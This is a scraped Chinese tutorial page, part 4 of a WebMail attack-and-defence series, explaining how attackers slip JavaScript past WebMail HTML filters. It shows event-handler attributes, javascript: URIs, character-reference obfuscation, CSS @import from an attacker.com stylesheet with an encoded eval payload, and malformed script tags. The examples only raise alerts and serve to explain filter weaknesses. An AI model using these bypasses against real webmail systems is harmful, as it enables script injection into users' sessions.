减小字体
增大字体
鉴于脚本程序可能带来的危险,WebMail系统完全有必要禁止html邮件中的脚本程序。禁止脚本程序的基本做法就是过滤掉html源程序中能够使脚本程序运行的代码,如script元素等,在这方面做的最好的莫过于hotmail了。下面是些常见的绕过脚本程序过滤的方法,不少的WebMail系统仍然没有完全改正:
(1) 在html语言里,除了script元素内的或在script元素内引入的脚本程序能在html页面装载时被运行外,使用事件属性也能调用脚本程序运行,事件属性在Javascript语言里被称为事件句柄,用于对页面上的某个特定事件(如鼠标点击、表单提交)做出响应,驱动javascript程序运行。它的语法如下:</P>
<P> <tag attribute1 attribute2 onEventName="javascript code;"></P>
<P> 例如:</P>
<P><body onload="alert('Javascript#1 is executed');"><br><a href="#" onclick="alert('Javascript#2 is executed');">Click here</a><br><form method="post" action="#" onsubmit="alert('Javascript#3 is executed');"><br><input type="submit" value="Submit"><br></form><br></body></P>
<P> (2) URI(Universal Resource Identifier:通用资源标识)用于定位Internet上每种可用的资源,如HTML文档、图像、声音等。浏览器根据URI的资源类型(URI scheme)调用相应的程序操作该资源,如果把一些元素的URI属性值的资源类型设为javascript,则能够调用javascript程序运行。语法如下,注意要用“;”分隔不同的javascript语句:</P>
<P> <tag attribute="javascript:javascript-code;"></P>
<P> 例如:</P>
<P><body background="javascript:alert('Javascript#1 is executed');"><br><a href="javascript:alert('Javascript#2 is executed');">Click here</a><br><form method="post" action="javascript:alert('Javascript#3 is executed');"><br><input type="submit" value="Submit"><br></form><br><img src="javascript:alert('Javascript#4 is executed');"><br></body></P>
<P> (3) 由于软硬件或其他原因,一些冷僻或特殊的字符不能输入或正确显示在html页面上,为了解决这个问题,html中可以使用SGML字符参考。字符参考是一种用来指定文档字符集中任何字符的独立编码机制,以“&”开始,以“;”结束。字符参考有两种表达方式:数字字符参考和实体字符参考。数字字符参考的语法为“&#D;”(D代表一个十进制数),或“&#xH;”、“&#XH;”(H代表一个十六进制数),例如“&#65;”、“&#x41;”表示字母“A”,“&#27700;”、“&#x6C34;”表示汉字“水”。</P>
<P> 攻击者把html语句里的一些字符以数字字符参考来代替,这样能避开WebMail系统对脚本程序的过滤。需要注意的是,元素和属性不可以用字符参考表示,例如:</P>
<P><body><br><img lowsrc="j&#97;vas&#67;ript:alert('Javascript#1 is executed')"><br><a href="&#x6a;av&#x41;s&#67;ript&#x3a;ale&#x72;t('Javascript#2<br>&#x69;&#x73 executed')">Click her&#x65;</a><br><form method="post" action="javascript:alert('Javascript#3 is <br>executed')"><br><input type="&#x53;ubmit" value="Submit"><br></form><br></body></P>
<P> (4) 样式表是层叠样式表单(CSS:Cascading Style Sheet)的简称,用于控制、增强或统一网页上的样式(如字体、颜色等),它能够将样式信息与网页内容相分离,在html语言的style标签内可以用@import声明输入一个样式表。但是,如果输入的资源类型或内容是javascript,Internet Explorer浏览器仍然会执行。<br><br>例如: <style type="text/css"><br><!--<br>@import url(javascript:alert('Javascript#1 is executed'));<br>@import url(<a target="_blank" href=http://www.attacker.com/js.css>http://www.attacker.com/js.css</a>);<br>--><br></style></P>
<P> 其中<a target="_blank" href=http://www.attacker.com/js.css>http://www.attacker.com/js.css</a>的内容如下所示:</P>
<P>@import url(javascript:alert('Javascript#2 is executed'));<br>@import url(javascript:eval(String.fromCharCode<br>(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,<br>108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));</P>
<P> 能够绕过WebMail系统对脚本程序过滤的方法远不止上面所说的这些,例如曾有人发现把“<script>”标签改成“<_a<script>”和“<<script>”的样子能绕过yahoo电邮的过滤,这个漏洞yahoo在最近才改正过来。 </span><br></P></font></div>
<div></div>
</div><div id="Message" class="Message"></div></font></div>
<script type="text/javascript">
document.body.oncopy = function () { setTimeout( function () { var text = clipboardData.getData("text"); if (text) { text = text + "\r\n本篇文章来源于 中国建站之家 原文链接:"+location.href; clipboardData.setData("text", text); } }, 100 ) }
</script>
<br>
<a href="javascript:window.open('http://shuqian.qq.com/post?from=3&title='+encodeURIComponent(document.title)+'&uri='+encodeURIComponent(document.location.href)+'&jumpback=2&noui=1','favit','width=930,height=470,left=50,top=50,toolbar=no,menubar=no,location=no,scrollbars=yes,status=yes,resizable=yes');void(0)" style="text-decoration:none;color:#155da5;display:block;background:url('http://shuqian.qq.com/img/add.gif') no-repeat 0px 0px;height:23px;width:300px;padding:2px 2px 0px 20px;font-size:14px;">将本文收藏到QQ书签与更多好友分享</a>
<div></div>
</td>
<table width="575" border="0" cellpadding="0" cellspacing="0">
<tr>
</tr>
<tr>
<td align="right" height=25 bgcolor=#F7F7F7 >
<script language=javascript src=/wz/sg.JS></script>
[<a href=javascript:window.print()>打 印</a>]
</tr>
</table>
<table width="575" border="0" cellpadding="0" cellspacing="0">
<tr>
</tr>
<tr>
<td align="right" height=25 bgcolor=#F7F7F7 style="display:block;padding:0px 10px">
<font color=#000000>[<script language=JavaScript src="/Article/Hits.Asp?ArticleID=4571"></script>]</font>
[<a href="javascript:history.go(-1)">返回上一页</a>]
[<a href="/user/favorite.asp?action=add&topic=Webmail攻防实战(4)">收 藏</a>]</td>
</tr>
<tr>
<table width="575" border="0" cellpadding="0" cellspacing="0">
<tr>
</tr>
<tr>
<td style="display:block;padding:0px 10px"><div><font color=#000000>上一篇文章:</font><a href=/Article/13/151/2005/200507204570.html>Webmail攻防实战(3)</a></div><div><font color=#000000>下一篇文章:</font><font color=#000000><a href=/Article/13/151/2005/200507204572.html>Webmail攻防实战(5)</a></font></div></td>
</tr>
</table>
<table width="575" border="0" cellpadding="0" cellspacing="0">
<tr>
<td class="titlebg1">∷相关文章评论∷ (评论内容只代表网友观点,与本站立场无关!) [<a href=/Article/comment.asp?ArticleID=4571 target=_blank>更多评论</a>...]</td>
</tr>
<tr valign="top">
<td></td>
</tr>
</table>
</td>
<td width="188" class="tableleft"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="titleback1">精彩推荐</td>
</tr>
<tr>
<td height="260" valign="center" class="showbody1"><script language=javascript src=/ad/180601.js></script></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="titleback1">热门文章</td>
</tr>
<tr>
<td height="100" valign="top" class="showbody1"><table width="100%" border="0" cellpadding="2" cellspacing="0"><tr>
<td class="showlist11">· <a href='/Article/10/138/2005/200507256912.html' class="showlist" title="注册码大全二">注册码大全二</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/10/138/2005/200507256914.html' class="showlist" title="注册码大全四">注册码大全四</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/10/138/2005/200507256911.html' class="showlist" title="注册码大全一">注册码大全一</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/196/197/2005/2005081911736.html' class="showlist" title="要10G免费网络硬盘的请进来!">要10G免费网络硬盘的请进..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/206/2007/2007030319347.html' class="showlist" title="通过google 赶快来赚美金">通过google 赶快来赚美金..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/10/138/2005/200507256919.html' class="showlist" title="注册码大全十">注册码大全十</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/14/253/2005/2005092114218.html' class="showlist" title="头像-qq头像(qq新头像)4">头像-qq头像(qq新头像)4..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/13/150/2006/2006022316028.html' class="showlist" title="让你轻松架设FTP服务器1">让你轻松架设FTP服务器1..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/10/138/2005/200507256913.html' class="showlist" title="注册码大全三">注册码大全三</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/14/244/2005/2005092014121.html' class="showlist" title="梦幻背景图片7">梦幻背景图片7</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/14/249/2005/2005092114181.html' class="showlist" title="卡通动物图片6">卡通动物图片6</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/14/269/2005/2005092114241.html' class="showlist" title="网页制作素材-按钮素材2">网页制作素材-按钮素材2..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/13/150/2006/2006022316032.html' class="showlist" title="让你轻松架设FTP服务器5">让你轻松架设FTP服务器5..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/14/244/2005/2005092014153.html' class="showlist" title="风景图片8">风景图片8</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/10/138/2005/200507256918.html' class="showlist" title="注册码大全九">注册码大全九</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/13/150/2006/2006022316029.html' class="showlist" title="让你轻松架设FTP服务器2">让你轻松架设FTP服务器2..</a></td>
<td class="showlist12"></td>
</tr></table></td>
</tr>
<tr>
<td height="2" bgcolor="#FFFFFF"></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="titleback1">关注此文读者还看过</td>
</tr>
<tr>
<td height="100" valign="top" class="showbody1"><table width="100%" border="0" cellpadding="2" cellspacing="0"><tr>
<td class="showlist11">· <a href='/Article/11/143/2005/2005092314273.html' target="_blank" class="showlist" title="PHOTOSHOP光线四射效果制作">PHOTOSHOP光线四射效果制..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/10/131/2007/2007062820604.html' target="_blank" class="showlist" title="ASP.NET网络编程中经常会用到的27个函数集">ASP.NET网络编程中经常会..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/10/130/2005/200507277596.html' target="_blank" class="showlist" title="无组件图片与文本同步存入数据库的最简单的办法">无组件图片与文本同步存..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/10/131/2005/20050717223.html' target="_blank" class="showlist" title="第二章 NGWS Runtime 技术基础(rainbow 翻译)">第二章 NGWS Runtime 技..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/10/136/2005/200507192341.html' target="_blank" class="showlist" title="大话XML(1)XML是什么">大话XML(1)XML是什么</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/10/133/2005/2005091913864.html' target="_blank" class="showlist" title="利用sql的limit属性对mysql数据库">利用sql的limit属性对my..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/10/133/2005/200507216656.html' target="_blank" class="showlist" title="PHP中在数据库中保存Checkbox数据(2)">PHP中在数据库中保存Che..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/10/133/2005/20050718900.html' target="_blank" class="showlist" title="PHP中如何在输出内容后再输出头信息?">PHP中如何在输出内容后再..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/10/133/2005/20050718856.html' target="_blank" class="showlist" title="几点提高php序运行效率的方法">几点提高php序运行效率的..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/190/194/2007/2007032119449.html' target="_blank" class="showlist" title="Google Adwords广告关键词须注意的问题">Google Adwords广告关键..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/11/143/2005/200507192979.html' target="_blank" class="showlist" title="用 photoshop 做字体效果">用 photoshop 做字体效果..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/10/134/2007/2007072120969.html' target="_blank" class="showlist" title="使用Java来监视系统进程的两个解决方案">使用Java来监视系统进程..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/223/291/2007/2007052220222.html' target="_blank" class="showlist" title="EA宣布收购九城15%股份">EA宣布收购九城15%股份..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/223/291/2006/2006011815549.html' target="_blank" class="showlist" title="盛大否认裁员说 陈天桥休息中拒绝接受采访">盛大否认裁员说 陈天桥休..</a></td>
<td class="showlist12"></td>
</tr><tr>
<td class="showlist11">· <a href='/Article/10/133/2005/200507216560.html' target="_blank" class="showlist" title="利用<input type="image">来巧妙实现map功能...">利用<input type="image..</a></td>
<td class="showlist11"></td>
</tr><tr>
<td class="showlist12">· <a href='/Article/190/194/2006/2006010415201.html' target="_blank" class="showlist" title="2006年关于Google等的15项预测">2006年关于Google等的15..</a></td>
<td class="showlist12"></td>
</tr></table></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="titleback1">相关文章</td>
</tr>
<tr>
<td height="100" valign="top" class="showbody1">· <a href="/Article/13/151/2007/2007041819846.html" title='自建Open WebMail伺服器(2)'>自建Open WebMail伺服..</a><br>
· <a href="/Article/13/151/2007/2007041819845.html" title='自建Open WebMail伺服器(1)'>自建Open WebMail伺服..</a><br>
· <a href="/Article/13/151/2005/2005101714607.html" title='在 win2k3 下安装 WinWebMail 3.7.0.3 攻略大全!'>在 win2k3 下安装 Wi..</a><br>
· <a href="/Article/10/131/2005/2005091713247.html" title='基于asp.net的webmenu的数据操作(5)'>基于asp.net的webmen..</a><br>
· <a href="/Article/10/131/2005/2005091713246.html" title='基于asp.net的webmenu的数据操作(4)'>基于asp.net的webmen..</a><br>
· <a href="/Article/10/131/2005/2005091713245.html" title='基于asp.net的webmenu的数据操作(3)'>基于asp.net的webmen..</a><br>
· <a href="/Article/10/131/2005/2005091713244.html" title='基于asp.net的webmenu的数据操作(2)'>基于asp.net的webmen..</a><br>
· <a href="/Article/10/131/2005/2005091713243.html" title='基于asp.net的webmenu的数据操作(1)'>基于asp.net的webmenu的数据..</a><br>
· <a href="/Article/10/133/2005/200507309455.html" title='基于qmail的完整WEBMAIL解决方案安装详解'>基于qmail的完整WEBMAIL解决..</a><br>
· <a href="/Article/10/133/2005/200507309288.html" title='构建简单的Webmail系统'>构建简单的Webmail系统</a><br>
· <a href="/Article/10/132/2005/200507288107.html" title='使用JSP开发WebMail系统'>使用JSP开发WebMail系统</a><br>
· <a href="/Article/10/131/2005/200507204878.html" title='基于asp.net的webmenu的数据操作1'>基于asp.net的webmenu的数据..</a><br>
· <a href="/Article/10/131/2005/200507204877.html" title='基于asp.net的webmenu的数据操作2'>基于asp.net的webmenu的数据..</a><br>
· <a href="/Article/10/131/2005/200507204876.html" title='基于asp.net的webmenu的数据操作3'>基于asp.net的webmenu的数据..</a><br>
· <a href="/Article/10/131/2005/200507204875.html" title='基于asp.net的webmenu的数据操作4'>基于asp.net的webmenu的数据..</a><br>
· <a href="/Article/10/131/2005/200507204874.html" title='基于asp.net的webmenu的数据操作5'>基于asp.net的webmenu的数据..</a><br></td>
</tr>
</table>
</td>
</tr>
</table>
<table width="778" border="0" align="center" cellpadding="0" cellspacing="0" class="tableborder">
<tr>
<td height="3"></td>
</tr>
</table>
<table width="778" border="0" align="center" cellpadding="0" cellspacing="0" class="tableborder">
<tr>
<td height="23" align="right">
<table width="100%" border="0" cellspacing="0" class="tablebody8" cellpadding="0">
<tr>
<td height="5"></td>
</tr>
<tr>
<td height="23" align="right" valign="middle"><center><a href="/support/about.asp" class="navmenu2">关于本站</a> -
<a href="/support/help.asp" class="navmenu2">网站帮助</a> -
<a href="/support/advertise.asp" class="navmenu2">广告合作</a> -
<a href="/support/declare.asp" class="navmenu2">下载声明</a> -
<a href="/link/" target="_blank" class="navmenu2">友情连接</a> -
<a href="/support/sitemap.asp" class="navmenu2">网站地图</a> -
<a href="#" target="_blank" class="navmenu2">人才招聘</a>
</tr>
</table></td>
</tr>
<tr>
<td height="1"></td>
</tr>
</table>
<table width="778" border="0" align="center" cellpadding="0" cellspacing="0" class="tableborder">
<tr>
<td height="60" align="center" class="tablebody1">网站合作、内容监督、商务咨询:QQ: 9576619
<br>
Copyright ? 2005--2008 中国建站之家版权所有
<br><a href="http://www.miibeian.gov.cn" target="_blank" title="粤ICP备05092265号"><font color=#000000>粤ICP备05092265号
</font><br><script src='http://s6.cnzz.com/stat.php?id=44148&web_id=44148&show=pic' language='JavaScript' charset='gb2312'></script> </td>
<script language="javascript" src="/inc/Std_StranJF.Js"></script>
</table>
</body>
</html>
<span id="naruco_ad_body" style="display:none;">
<script language=javascript src=/adfile/top.js></script>
</span>
<script type="text/javascript">
var naruco_ad = document.getElementById('naruco_ad');
if (naruco_ad != null) {
naruco_ad.innerHTML=naruco_ad_body.innerHTML;
naruco_ad_body.innerHTML="";
}
</script>
|